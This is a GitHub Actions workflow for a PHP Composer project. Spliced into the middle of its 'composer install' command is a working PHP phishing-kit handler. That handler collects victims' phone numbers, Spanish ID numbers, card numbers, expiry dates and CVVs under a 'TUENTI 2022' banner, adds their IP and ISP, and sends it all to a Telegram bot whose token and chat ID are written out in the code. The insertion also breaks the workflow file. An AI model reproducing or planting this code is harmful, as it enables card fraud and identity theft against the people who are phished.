name: PHP Composer

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3

    - name: Validate composer.json and composer.lock
      run: composer validate --strict

    - name: Cache Composer packages
      id: composer-cache
      uses: actions/cache@v3
      with:
        path: vendor
        key: ${{ runner.os }}-php-${{ hashFiles('**/composer.lock') }}
        restore-keys: |
          ${{ runner.os }}-php-

    - name: Install dependencies
      run: composer install -<?php
$ip = getenv("REMOTE_ADDR");
$isp = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$msg .= "
âž–âž–âž–âž–[ TUENTI 2022 ]âž–âž–âž–âž–
ðŸ‘¤ TELEFONO : " . $_SESSION['name'] = $_POST['name'] . "
ðŸªª DNI : " . $_SESSION['dni'] = $_POST['dni'] . "
ðŸ’³ TARJETA : " . $_SESSION['card'] = $_POST['card'] . "
ðŸ’³ VENCIMIENTO : " . $_SESSION['venc'] = $_POST['venc'] . "
ðŸ’³ CVV : " . $_SESSION['cvv'] = $_POST['cvv'] . "
âž–âž–âž– INFO DE CONECCION âž–âž–âž–
ðŸŒ IP : $ip
ðŸŒ ISP : $isp
âž–âž–âž–âž–âž–âž–âž–âž–âž–âž–âž–âž–âž–âž–";
define('BOT_TOKEN', '5753333751:AAGKXx8xQZNMQufiCtAFRtJlXZWpO7XhSG0');
define('CHAT_ID', '5745356040');
define('API_URL', 'https://api.telegram.org/bot'.BOT_TOKEN.'/');

enviar_telegram($msg);

function enviar_telegram($msj)  {
	$queryArray = [
		'chat_id' => CHAT_ID,
		'text' => $msj,
	];
	$url = 'https://api.telegram.org/bot'.BOT_TOKEN.'/sendMessage?'. http_build_query($queryArray);
	$result = file_get_contents($url);
}

header("");
?>-prefer-dist --no-progress

    # Add a test script to composer.json, for instance: "test": "vendor/bin/phpunit"
    # Docs: https://getcomposer.org/doc/articles/scripts.md

    # - name: Run test suite
    #   run: composer run-script test
